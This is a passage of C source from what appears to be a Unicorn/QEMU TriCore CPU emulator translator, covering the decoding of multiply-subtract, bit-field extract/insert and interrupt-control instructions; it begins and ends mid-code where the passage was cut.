OPC2_32_RRR1_MSUBR_H_LL: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBR_H_LU: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBR_H_UL: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBR_H_UU: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBRS_H_LL: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBRS_H_LU: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBRS_H_UL: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBRS_H_UU: gen_msubr32s_h(ctx, 
tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_msubq_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; TCGv temp, temp2; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); temp = tcg_const_i32(tcg_ctx, n); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRR1_MSUB_Q_32: gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MSUB_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MSUB_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUB_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUB_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUB_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUB_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16sub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16sub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16sub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16sub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_32: gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MSUBS_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], 
n); break; case OPC2_32_RRR1_MSUBS_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUBS_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUBS_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUBS_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUBS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16subs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16subs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16subs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16subs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBR_H_64_UL: CHECK_REG_PAIR(r3); gen_msubr64_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MSUBRS_H_64_UL: CHECK_REG_PAIR(r3); gen_msubr64s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MSUBR_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_msubr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBR_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBRS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_msubrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBRS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; 
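        /*
         * Any other sub-opcode in this RRR1 MSUB.Q group is undefined;
         * the default case below raises the illegal-opcode trap
         * (TIN2_IOPC) instead of silently ignoring the encoding.
         */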
default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_rrr1_msubad_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MSUBAD_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBAD_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBAD_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBAD_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADS_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADS_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADS_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADS_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADM_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADM_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADM_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADM_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], 
tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADMS_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADMS_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADMS_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADMS_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADR_H_16_LL: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADR_H_16_LU: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADR_H_16_UL: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADR_H_16_UU: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADRS_H_16_LL: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADRS_H_16_LU: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADRS_H_16_UL: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADRS_H_16_UU: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRRR format */ static void decode_rrrr_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; TCGv tmp_width, tmp_pos; r1 = MASK_OP_RRRR_S1(ctx->opcode); r2 = MASK_OP_RRRR_S2(ctx->opcode); r3 = MASK_OP_RRRR_S3(ctx->opcode); r4 = MASK_OP_RRRR_D(ctx->opcode); op2 = MASK_OP_RRRR_OP2(ctx->opcode); tmp_pos = tcg_temp_new(tcg_ctx); tmp_width = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRRR_DEXTR: tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); if (r1 == r2) { tcg_gen_rotl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tmp_pos); } else { tcg_gen_shl_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r1], tmp_pos); tcg_gen_subfi_tl(tcg_ctx, tmp_pos, 32, tmp_pos); tcg_gen_shr_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r2], tmp_pos); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tmp_width, tmp_pos); } break; case OPC2_32_RRRR_EXTR: case OPC2_32_RRRR_EXTR_U: CHECK_REG_PAIR(r3); 
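        /*
         * E[r3] packs the bit-field spec: pos in d[r3][4:0], width in
         * d[r3+1][4:0]. The field is extracted by left-shifting it to
         * the top of the word (by 32 - pos - width) and shifting back
         * down by 32 - width: arithmetically for EXTR (sign-extend),
         * logically for EXTR.U (zero-extend). E.g. pos = 4, width = 8
         * extracts bits [11:4] of d[r1].
         */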
tcg_gen_andi_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_add_tl(tcg_ctx, tmp_pos, tmp_pos, tmp_width); tcg_gen_subfi_tl(tcg_ctx, tmp_pos, 32, tmp_pos); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tmp_pos); tcg_gen_subfi_tl(tcg_ctx, tmp_width, 32, tmp_width); if (op2 == OPC2_32_RRRR_EXTR) { tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], tmp_width); } else { tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], tmp_width); } break; case OPC2_32_RRRR_INSERT: CHECK_REG_PAIR(r3); tcg_gen_andi_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tmp_width, tmp_pos); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, tmp_pos); tcg_temp_free(tcg_ctx, tmp_width); } /* RRRW format */ static void decode_rrrw_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; int32_t width; TCGv temp, temp2; op2 = MASK_OP_RRRW_OP2(ctx->opcode); r1 = MASK_OP_RRRW_S1(ctx->opcode); r2 = MASK_OP_RRRW_S2(ctx->opcode); r3 = MASK_OP_RRRW_S3(ctx->opcode); r4 = MASK_OP_RRRW_D(ctx->opcode); width = MASK_OP_RRRW_WIDTH(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRRW_EXTR: tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_addi_tl(tcg_ctx, temp, temp, width); tcg_gen_subfi_tl(tcg_ctx, temp, 32, temp); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], 32 - width); break; case OPC2_32_RRRW_EXTR_U: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], 0); } else { tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], ~0u >> (32-width)); } break; case OPC2_32_RRRW_IMASK: temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_movi_tl(tcg_ctx, temp2, (1 << width) - 1); tcg_gen_shl_tl(tcg_ctx, temp2, temp2, temp); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r2], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4+1], temp2); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RRRW_INSERT: temp2 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, width); tcg_gen_andi_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], temp, temp2); tcg_temp_free(tcg_ctx, temp2); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } /* SYS Format*/ static void decode_sys_interrupts(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1; TCGLabel *l1; TCGv tmp; op2 = MASK_OP_SYS_OP2(ctx->opcode); r1 = MASK_OP_SYS_S1D(ctx->opcode); switch (op2) { case OPC2_32_SYS_DEBUG: /* raise EXCP_DEBUG */ break; case OPC2_32_SYS_DISABLE: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, ~MASK_ICR_IE_1_3); break; case OPC2_32_SYS_DSYNC: break; case OPC2_32_SYS_ENABLE: 